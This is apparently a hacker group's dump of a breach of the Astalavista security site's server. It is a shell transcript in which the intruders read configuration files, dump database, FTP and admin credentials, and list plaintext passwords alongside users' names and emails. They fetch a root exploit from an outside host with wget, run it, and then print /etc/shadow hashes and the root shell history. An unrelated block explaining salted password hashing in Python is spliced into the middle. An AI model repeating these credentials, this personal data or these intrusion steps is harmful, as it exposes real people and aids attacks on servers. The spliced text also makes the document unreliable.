>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
>> It's a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking."
>> Go ahead, try and hack our server - in a completely legal way!
>> Learn by doing: We offer our members tricky tasks and challenges on an
>> ongoing basis so you can test your knowledge and abilities. You can also
>> demonstrate what you've mastered by taking part in regular hacker contests
>> and war games

[~] Let's take a look there, after all... they are hack-proof, aren't they?!

[-] Tricky task: Find home dir of
astalavista.net

sh-3.2$ ls -la ~astanet
total 48
drwx--x--x 6 astanet astanet 4096 Dec 23 15:55 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
-rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
-rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
-rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
-rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
-rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
sh-3.2$ ls -la
total 200
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .
drwx--x--x 8 astanet astanet 4096 Dec 23 13:53 ..
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 astanet@astalavista.com
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
-rw-r--r-- 1 astanet astanet 25724 Apr 4 2006 banner.jpg
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
-rw-r--r-- 1 astanet astanet 36 Jan 5 2006 error.php
-rw-r--r-- 1 astanet astanet 1406 Jan 5 2006 favicon.ico
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
-rw-r--r-- 1 astanet astanet 18 Jan 5 2006 htaccess
-rw-r--r-- 1 astanet astanet 585 Mar 24 14:50 .htaccess
-rw-r--r-- 1 astanet astanet 398 Jan 5 2006 index1.php
-rw-r--r-- 1 astanet astanet 1036 Jan 5 2006 _index.html
-rw-r--r-- 1 astanet astanet 6880 Dec 23 14:44 index.php
-rw-r--r-- 1 astanet astanet 676 Mar 21 2006 index_redirect.php
-rw-r--r-- 1 astanet astanet 739 Feb 24 2006 index.swf
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
-rw-r--r-- 1 astanet astanet 7219 Feb 24 2006 pix1.swf
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
-rw-r--r-- 1 astanet astanet 23 Jan 5 2006 robots.txt
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
-rw-r--r-- 1 astanet astanet 35 Dec 4 2006 webcash.php
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
sh-3.2$ head -20 index.php
<?PHP
/**
 * Mainfile (external) for astalavistaNET v2.0
 *
 * @copyright Astalavista IT Engineering GmbH
 * @author Thomas Kaelin <thomas.kaelin@astalavista.ch>
 * @version 1.0
 */
if ($_SERVER['PHP_SELF'] == '/webcash.php') {
    $dontStartSession = false;
} else {
    $dontStartSession = true;
}
require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');

sh-3.2$ cd config
sh-3.2$ ls -la
total 32
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
drwxr-x--- 29 astanet apache 4096
Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 987 Aug 11 2006 adm.conf.php
-rw-r--r-- 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
-rw-r--r-- 1 astanet astanet 913 Aug 11 2006 cron.conf.php
-rw-r--r-- 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
-rw-r--r-- 1 astanet astanet 2724 May 30 2007 int.conf.php
sh-3.2$ cat com.conf.php
[snip]
//member-database
$_CONFIG['db_mem_server'] = 'localhost';
$_CONFIG['db_mem_database'] = 'astanet_membersystem';
$_CONFIG['db_mem_user'] = 'astanet_db';
$_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
$_CONFIG['db_mem_debug'] = false; //true or false
//ads-database
$_CONFIG['db_ads_server'] = 'localhost';
$_CONFIG['db_ads_database'] = 'astanet_ads';
$_CONFIG['db_ads_user'] = 'astanet_db';
$_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
$_CONFIG['db_ads_debug'] = false; //true or false
//rainbow-database
$_CONFIG['db_rainbow_server'] = '212.254.194.163';
$_CONFIG['db_rainbow_database'] = 'rainbow';
$_CONFIG['db_rainbow_user'] = 'dinu';
$_CONFIG['db_rainbow_password'] = 'dinudinu';
$_CONFIG['db_rainbow_debug'] = false; //true or false
//mailing lists database
$_CONFIG['db_mailing_lists_server'] = 'localhost';
$_CONFIG['db_mailing_lists_database'] = 'astanet_mailing_lists';
$_CONFIG['db_mailing_lists_user'] = 'astanet_db';
$_CONFIG['db_mailing_lists_password'] = 'TXwVrC7hbq';
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
//paypal
$_CONFIG['sub_pp_url'] = 'https://www.paypal.com/cgi-bin/webscr';
$_CONFIG['sub_pp_cmd'] = '_xclick';
$_CONFIG['sub_pp_business'] = 'info@astalavista.net';
$_CONFIG['sub_pp_noship'] = '1';
$_CONFIG['sub_pp_referer'] = 'https://www.paypal.com/';
[snip]

sh-3.2$ cd ..
sh-3.2$ cd member
sh-3.2$ ls -la
total 20
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 19 Jan 13 14:02 .htaccess
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
sh-3.2$ cat .htaccess
SecFilterEngine off
sh-3.2$ cd ..
sh-3.2$ cd cron
sh-3.2$ ls -la
total 168 drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 . drwxr-x--- 29 astanet apache 4096 Jan 6 13:58
.. -rw-r--r-- 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php -rw-r--r-- 1 astanet astanet 2356 Aug 11
2006 0_functions.php -rw-r--r-- 1 astanet astanet 3616 Dec 23 15:44 1_daily.php -rw-r--r-- 1 astanet
astanet 527 Aug 11 2006 1_fivemin.php -rw-r--r-- 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php -
rw-r--r-- 1 astanet astanet 432 Aug 11 2006 1_weekly.php -rw-r--r-- 1 astanet astanet 2277 Aug 11 2006
2_advertising.php -rw-r--r-- 1 astanet astanet 4882 Dec 23 15:40 2_archives.php -rw-r--r-- 1 astanet
astanet 3784 Aug 16 2006 2_awstats.sh -rw-r--r-- 1 astanet astanet 14894 Jan 12 08:51
2_expire.bak.php -rw-r--r-- 1 astanet astanet 14979 Jan 12 09:10 2_expire.php -rw-r--r-- 1 astanet
astanet 7657 Aug 15 2006 2_exploitree_updater.php -rw-r--r-- 1 astanet astanet 686 Dec 23 16:31
2_filesize.sh -rw-r--r-- 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php -rw-r--r-- 1 astanet
astanet 15664 Sep 22 2006 2_keywords.php -rw-r--r-- 1 astanet astanet 1233 Aug 11 2006
2_proxy_checker.php -rw-r--r-- 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php -rw-r--r-- 1
astanet astanet 796 Aug 11 2006 99_create_emails.php drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006
99_lang_email -rw-r--r-- 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php -rw-r--r-- 1 astanet
astanet 9620 Jan 6 16:05 login_reminder_test.php sh-3.2$ cd .. sh-3.2$ cd _007 sh-3.2$ ls -la total 24
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 . drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .. -rw-r--
r-- 1 astanet astanet 96 Dec 23 15:17 .htaccess -rw-r--r-- 1 astanet astanet 3263 Jan 15 2007 index.php -
rw-r--r-- 1 astanet astanet 20 Dec 27 2006 info.php drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006
sitemap sh-3.2$ cat .htaccess authType Basic authName Admin authUserFile
/home/astanet/auth/.htadm_pwd require valid-user sh-3.2$ cat /home/astanet/auth/.htadm_pwd
admin2net:CR0bl65MwhfT sh-3.2$ mysql -u astanet_db -p Enter password: Welcome to the MySQL
monitor. Commands end with ; or \g. Your MySQL connection id is 275153 Server version: 5.0.45-
community-log MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases; +-----------------------+ | Database | +-----------------------+ | information_schema | |
astanet_ads | | astanet_mailing_lists | | astanet_mediawiki | | astanet_membersystem | | test | +------
-----------------+ 6 rows in set (0.00 sec) mysql> use astanet_membersystem Database changed mysql>
show tables; +-----------------------------------+ | Tables_in_astanet_membersystem | +-----------------------------
------+ | blacklist_categories | | blacklist_content | | blacklist_levels | | blacklist_mcset | |
dir_categories | | dir_comments | | dir_links | | dir_temp | | dir_votes | | documents | |
documents_categories | | email_content | | email_settings | | exploits | | exploits_categories | |
exploittree_categories | | exploittree_exploits | | home_values | | iso_countries | | links_categories | |
links_records | | links_unauth | | links_votes | | log | | news_categories | | news_comments | |
news_emoticons | | news_latest | | news_messages | | news_statistics | | news_votes | |
prices_content | | prices_offers | | rss_settings | | sessions | | stats_signups | | u2u2 | | u2u_contact |
| u2u_settings | | user_keywords_selected_categories | | users | | users_ipn_test | |
users_keyword_values | | users_profile | | users_temp | | users_upgrade | +-----------------------------------
+ 46 rows in set (0.00 sec) mysql> describe users; +--------------------------+--------------------------------------+----
--+-----+---------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +--------------------------
+--------------------------------------+------+-----+---------------------+----------------+ | primary_key | smallint(5)
unsigned | NO | PRI | NULL | auto_increment | | user | varchar(50) | NO | | | | | nickname |
varchar(30) | NO | MUL | anonymous | | | password | varchar(30) | NO | | | | | userlevel | tinyint(3) |
YES | MUL | NULL | | | exp | int(8) unsigned | NO | | 0 | | | email | varchar(50) | NO | | | | | ip |
varchar(15) | NO | | 0 | | | proxy | set('0','1') | NO | | 0 | | | logtime | timestamp | NO | |
CURRENT_TIMESTAMP | | | login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | | |
anz_in | tinyint(1) | NO | | -1 | | | status | tinyint(1) unsigned | NO | | 0 | | | checked | set('0','1','2') |
NO | | 0 | | | freemember | set('0','1') | NO | | 0 | | | ordertype | set('transfer','wp','pp','mc','CnB') |
YES | | NULL | | | lang | tinytext | NO | | | | | adid | smallint(6) | NO | | 0 | | | pp_txn_id |
varchar(255) | YES | | NULL | | | cnb_transaction_id | varchar(255) | YES | | NULL | | | cnb_order_id |
varchar(255) | YES | | NULL | | | cnb_user_id | int(11) | YES | | 0 | | +--------------------------+-----------------
---------------------+------+-----+---------------------+----------------+ 22 rows in set (0.01 sec) mysql> select
count(*) as skids from users; +-------+ | skids | +-------+ | 25199 | +-------+ 1 row in set (0.00 sec) mysql>
select user,nickname,password,email from users where userlevel = 1; +--------------------------+----------------
------+------------------+-----------------------------------+ | user | nickname | password | email | +-------------------
-------+----------------------+------------------+-----------------------------------+ | pascal | prozac | astaman3 |
info@astalavista.net | | Ivan Schmid | rOOtless1 | astalavista4asta | ivan.schmid@comvation.com | |
qreymer | Palermo | qblsw85iam | eche@home.se | | Christian Wehrli | g0atherd | hitt?74 |
g0atherd@gmx.net | | Andrew Blake | Minky | liq73uid | a.blake@har.mrc.ac.uk | | Martin Wyss | dinu
| kj63;cXy | martin.wyss@astalavista.net | | Leandro Nery | Timan_no_Sanco | nery2002 |
leandronery@hotmail.com | | shaving ryans privates | ShavingRyansPrivates | memberboard313 |
shavingryansprivates1@hotmail.com | | Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 |
spoofedexistence@hotmail.com | | David M Lee | Daremo | icG12m03 | daremo@hackerheaven.com |
| David Corn | akriel | ve3uB$cUku | akriel@fallenroot.net | | Thomas Kalin | Gwanun | QwErTy123 |
thomas.kaelin@astalavista.net | | Marcus unknown | Cra58cker | hhCr4ck06 |
unknownmarcus@hotmail.com | | David Ellis | dellis203 | philip | dellis@nightwatchnss.com | | Lars
Christian Solberg | xeor | tF3s4|Nea | xeor@hush.com | | Paulo Santos | Be1er0ph0r1 | amor01 |
pmsantos@gmx.ch | | Thomas D?ppen | daha | asta4tom | thomas.daeppen@astalavista.ch | | Touraj
Abbasi Moghaddasi | -Crow1 | NetR0ck | toraj.a.m@gmail.com | | Fabius Bernet | traviser |
wellenreiter100 | fabius.bernet@astalavista.ch | | Zachary McElroy | duder1 | dirty245dix |
mcelroyzj@yahoo.com | | Leron Cohen | cohen2 | leron4free | leron@quiredmedia.com | | Beatriz
Pontes | anonymous1656 | pitas | joao.pedro.pontes@gmail.com | | Glafkos Charalambous |
anonymous2086 | si99490178$# | nowayout@webhostline.com | | developer COMVATION |
anonymous2402 | Ri?Q$Q$MVU | ivan.schmid@astalavista.ch | | Peter Fisher | cyph3r1 |
testZer025435 | cyph3r@astalavista.com | | sykadul | sykadul | ak29eral | sykadul@gmail.com | |
Ronny Janzi | commander1 | mpbdaagf6m | ronny.janzi@astalavista.ch | +--------------------------+-----------
-----------+------------------+-----------------------------------+ 27 rows in set (0.00 sec) mysql> exit; Bye [~]
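The `users` table above keeps `password` as a `varchar(30)` holding the password itself, and the query hands it back verbatim. The example below is added here and is not code from the dump or from astalavistaNET: it puts the plaintext compare that schema implies next to a salted PBKDF2-HMAC-SHA256 record with constant-time verification, and shows how a legacy column can be migrated on the next successful login instead of by forcing resets. The `login()` / `hash_password()` names, the `pbkdf2_sha256$…` record format and the sample rows are assumptions of the example, not anything on the page.

```python
import hashlib
import hmac
import os

# Constructed rows in the shape of the dumped `users` table (nickname -> password
# column). Names and passwords are made up for this example, not taken from the dump.
LEGACY_USERS = {
    "alice": "hunter2",
    "bob": "correct horse",
}

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (OWASP's 2023 figure)
SALT_LEN = 16
DK_LEN = 32


def verify_plaintext(stored, candidate):
    """The pattern the dump implies: stored column == submitted password.
    Whoever reads the table reads every password, and the compare is not
    constant-time either."""
    return stored == candidate


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record: pbkdf2_sha256$<iters>$<salt hex>$<dk hex>.
    Storing the parameters in the record lets the work factor be raised later
    without a flag day."""
    salt = os.urandom(SALT_LEN) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=DK_LEN)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_hashed(record, candidate):
    """Recompute with the record's own salt/iterations and compare in constant time."""
    try:
        algo, iters, salt_hex, dk_hex = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        salt, dk = bytes.fromhex(salt_hex), bytes.fromhex(dk_hex)
        iters = int(iters)
    except ValueError:  # malformed record: wrong field count or bad hex/int
        return False
    cand = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"), salt, iters, dklen=len(dk))
    return hmac.compare_digest(cand, dk)


def is_hashed(stored):
    return stored.startswith("pbkdf2_sha256$")


def login(table, nickname, candidate):
    """Authenticate against `table` (nickname -> password column).
    A legacy plaintext row is checked once with the old compare and, on success,
    rewritten as a PBKDF2 record, so the column migrates as users log in."""
    stored = table.get(nickname)
    if stored is None:
        # burn the same work as a real verify so unknown nicknames are not
        # distinguishable by response time
        hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"), b"\x00" * SALT_LEN, ITERATIONS, dklen=DK_LEN)
        return False
    if is_hashed(stored):
        return verify_hashed(stored, candidate)
    if verify_plaintext(stored, candidate):
        table[nickname] = hash_password(candidate)  # upgrade on the way through
        return True
    return False


if __name__ == "__main__":
    users = dict(LEGACY_USERS)
    print(login(users, "alice", "hunter2"), users["alice"][:40] + "...")
    print(login(users, "alice", "hunter3"))
```

A verify at this work factor costs a few hundred milliseconds of CPU per attempt, which is what makes a dumped table expensive to turn back into passwords; the plaintext column in the dump costs the reader nothing.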
[~] Plaintext passwords? Yes, those so-called "security professionals" who charge you $6.66 / month to register at their hack-proof portal save your passwords in plaintext... brilliant!

[~] This has been fun, but we want more.

sh-3.2$ uname -a
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2$ wget http://anti.sec.labs/g0troot
--13:33:37--  http://anti.sec.labs/g0troot
Resolving anti.sec.labs... 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18200 (18K) [text/plain]
Saving to: `g0troot'

100%[======================================================================>] 18,200      58.6K/s   in 0.3s

18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]

sh-3.2$ ./g0troot -i x86_64
[+] g0troot - anti.sec.labs
[+] Target: 2.6.18-128.1.10.el5
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
[+] r00tr00t
[~] Executing shell...

sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# cat /etc/shadow
root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
[snip]
admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::

sh-3.2# cat /etc/motd
#####################################################
#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
# |__| [__  |  |__| |    |__| |  | | [__   |  |__|  #
# |  | ___] |  |  | |___ |  |  \/  | ___]  |  |  |  #
#                                                   #
#####################################################
#                                                   #
#  Admin Contact - support@secureservertech.com     #
#                                                   #
#  Available ShortCuts                              #
#                                                   #
#  nst  - list active connections                   #
#  ddos - shows how many times each ip is connected #
#  ltr  - restart the webserver                     #
#  phpc - edit the php config file                  #
#  htc  - edit the webserver configuration file     #
#  up   - uptime                                    #
#  etd  - edit the motd of the day file             #
#  htr  - start and restart apache if needed        #
#  syng - shows active SYN_RECV connections         #
#  synd - syn flood blocker - "synd -h" for usage   #
#####################################################
#  NOTES:                                           #
#  Last Upgrade - 12-08-2008 by JF                  #
#  My.cnf/Mysql Optimization - 1-28-09              #
#                                                   #
#####################################################

sh-3.2# lastlog | grep -v Never
Username         Port     From             Latest
root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009
admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008
com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
astanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009

sh-3.2# ls -la
total 453376
drwxr-x---  15 root root      4096 Jun  4 08:40 .
drwxr-xr-x  25 root root      4096 Jun  3 02:43 ..
-rw-r--r--   1 root root   2394400 Oct 19  2007 10mbtest.zip
-rw-------   1 root root      1006 Sep 11  2007 anaconda-ks.cfg
-rw-------   1 root root     16836 Jun  4 07:21 .bash_history
-rw-r--r--   1 root root        24 Jan  6  2007 .bash_logout
-rw-r--r--   1 root root       191 Jan  6  2007 .bash_profile
-rw-r--r--   1 root root       176 Jan  6  2007 .bashrc
-rwx------   1 root root      1899 Oct 28  2007 bk.sh
-rw-r--r--   1 root root      1327 Nov 29  2007 cert
-rw-r--r--   1 root root 139860821 May 14  2008 contrexxbackup_20080514.sql
drwxr-xr-x   4 root root      4096 May 20  2008 .cpan
-rw-r--r--   1 root root       100 Jan  6  2007 .cshrc
-rw-r--r--   1 root root    323079 Mar 31 13:48 defaultp_ports.sql
drwx------   2 root root      4096 Oct 28  2007 .elinks
drwxr-xr-x  13 root root      4096 Mar 21  2008 gdb-6.7.1
-rw-r--r--   1 root root  15080950 Oct 29  2007 gdb-6.7.1.tar.bz2
-rw-------   1 root root         0 Apr 16 13:19 .history
-rw-r--r--   1 root root     16095 Sep 11  2007 install.log
-rw-r--r--   1 root root      2566 Sep 11  2007 install.log.syslog
-rw-r--r--   1 root root      1003 Jul 22  2007 install.sh
-rw-------   1 root root        35 Jun  2 14:23 .lesshst
drwxr-xr-x   2 root root      4096 Dec 29  2007 .lftp
drwxr-xr-x  10 root root      4096 Sep 14  2007 linux-2.6.19.2-grsec
-rw-r--r--   1 root root  94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
-rw-r--r--   1 root root   4737058 Sep 22  2007 linux-2.6.22.tar.bz2
-rwx------   1 root root       760 Sep 18  2008 lp
drwxr-xr-x  12 root root      4096 Nov 30  2007 lsws-3.3.1
-rw-r--r--   1 root root   2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
-rw-r--r--   1 root root   6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
drwxr-xr-x  12 root root      4096 Mar 21  2008 lsws-3.3.9
-rw-r--r--   1 root root   6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
drwxr-xr-x  12 root root      4096 May 29 15:10 lsws-4.0.3
-rw-r--r--   1 root root   6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
-rw-r--r--   1 root root     25316 Feb 15  2006 mybk.sh
-rw-------   1 root root        41 Oct 19  2007 .my.cnf
-rw-------   1 root root      2902 Jun  4 08:40 .mysql_history
-rwx------   1 root root     38873 Apr 16  2008 mysqlreport
-rw-------   1 root root        41 May 20  2008 .mytop
drwxr-xr-x   3 1000 1000      4096 May 20  2008 mytop-1.6
-rw-r--r--   1 root root     19720 Feb 17  2007 mytop-1.6.tar.gz
drwxr-xr-x   2 root root      4096 Oct 28  2007 .ncftp
-rw-------   1 root root      1462 Sep 21  2007 opt.php
-rw-r--r--   1 root root      3371 Sep 22  2007 p
-rw-r--r--   1 root root   7608429 Aug 30  2007 php-5.2.4.tar.bz2
-rw-------   1 root root      1024 Feb  3 21:32 .rnd
-rw-r--r--   1 root root       716 Nov 28  2007 server.csr
-rw-r--r--   1 root root       887 Nov 28  2007 server.key
drwx------   2 root root      4096 Oct 10  2008 .ssh
-rw-r--r--   1 root root     44227 Oct 28  2007 tar-inc-backup.dat
-rw-r--r--   1 root root       129 Jan  6  2007 .tcshrc
-rw-r--r--   1 root root 104874307 Oct 17  2007 test100.zip
-rw-r--r--   1 root root  67085540 Oct 19  2007 test100.zip.1
drwxr-xr-x   2 root root      4096 Apr 29 11:15 tmp
-rw-r--r--   1 root root     42596 May 21  2007 tuning-primer.sh
drwxrwxrwx  19 1000 users     4096 Mar 21  2008 valgrind-3.3.0
-rw-r--r--   1 root root   4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
-rw-------   1 root root     12997 May 16  2008 .viminfo

sh-3.2# cat .bash_history
[snip]
wget cp4sst.com/sstlinux.tar.gz
tar zxvf sstlinux.tar.gz
cd linux-2.6.27.10
sh install.sh
make bzImage ; make modules ; make modules_install ; make install
make clean
service mysqld restart
[snip]
cd /usr/sbin/
chmod 4777 traceroute
chmod 4777 ping
traceroute -I www.astalavista.ch
[snip]
vi /etc/csf/csf.conf
traceroute google.ch
service csf restart
tracert google.ch
service csf restart
traceroute www.google.ch
tracert www.google.ch
traceroute www.google.ch
locate traceroute
chown 4755 /bin/traceroute
chown 4777 /bin/traceroute
locate ping
chown 4755 /bin/ping
chown 4777 /bin/ping
cd /bin/
ls -ali | grep ping
chown root ping
chmod 4755 ping
ls -ali | grep traceroute
chown root traceroute
chmod 4755 traceroute
ls -ali | grep traceroute
traceroute -I www.google.ch
traceroute www.google.ch
whois pmsantos.ch
[snip]
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
top
ping ssth.ch
ping asdlkfaljgasd???ljg???lasj.ch
ping asdlkfaljgasdlasj.ch
ping www.ssth.ch
ping ssth.ch
nslookup www.google.ch
nslookup www.ssth.ch
man nslookup
ping www.google.ch
nslookup www.google.ch
nslookup www.google.ch
nslookup salfjasdlf.ch
[snip]
openssl passwd -1 sadf
openssl passwd -1 5cZNHstdTy
mysql
mysql
locate proftp
vi /etc/proftpd.passwd
service proftpd restart
locate proftpd.conf
vi /etc/proftpd.conf
vi /etc/proftpd.passwd
service proftpd restart
[snip]
/bin/sh /home/com/backup_system/backup.sh
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
ls -ali
mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
crontab -l
crontab -l
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
/home/com/public_html/modifications/cronjobs/exploits.sh
wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-x86_64-linux.tar.gz
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
cd lsws-4.0.3
sh install.sh
uptime
hdparm -tt /dev/sda
iostat
yum install iostat
iostat
whereis iostat
yjm clean all
yum clean all ; yum -y update
iostat
yum install systat
rpm -qa | grep iostat
rpm -qa | grep sysstat
rpm -qa | grep systat
dmesg -c
sysctl -p
uname -r
cd /usr/src
wget nix101.com/kernels/sstlinux.tar.gz
shutdown -r now
nano -w /boot/grub/grub.conf

sh-3.2# cat .my.cnf
[client]
user=da_admin
password=X9dctmRH

sh-3.2# cat /home/com/backup_system/backup.sh
#!/bin/sh
#####################################################################
#                                                                   #
#  incremental backup for astalavista.com                           #
#                                                                   #
#  author: Paulo M. Santos <paulo.santos@astalavista.com>           #
#                                                                   #
#####################################################################
[snip]
PROG_DIR="/home/com/backup_system";
BACKUP_DIR="/home/com/backups";
DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";

# ftp for synology backup server
FTP_HOST="212.254.194.163";
FTP_PORT="21";
FTP_USER="astalavista.com";
FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
FTP_DIR="/astalavista.com";

# database
DB_HOST="localhost";
DB_USER="contrexxuser2";
DB_PASS="0fEYNZgXz1pKe";
DB_DATABASE1="com_contrexx2_live";
DB_DATABASE2="com_contrexx2";
[snip]
ftp -in $FTP_HOST $FTP_PORT <<EOF
quote USER $FTP_USER
quote PASS $FTP_PASS
cd $FTP_DIR
put $DB_FULLNAME-SQL_Dump.tar
put $BACKUP_FULLNAME-Public_HTML.tar
close
bye
EOF

sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin
-rw-------  1 root    root     8192 Jun  4 03:03 aquota.group
-rw-------  1 root    root     8192 Jun  3 02:45 aquota.user
drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
drwx--x--x 10 com     com      4096 Apr 28 12:40 com
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
drwx------  3 jon     jon      4096 Sep 21  2007 jon
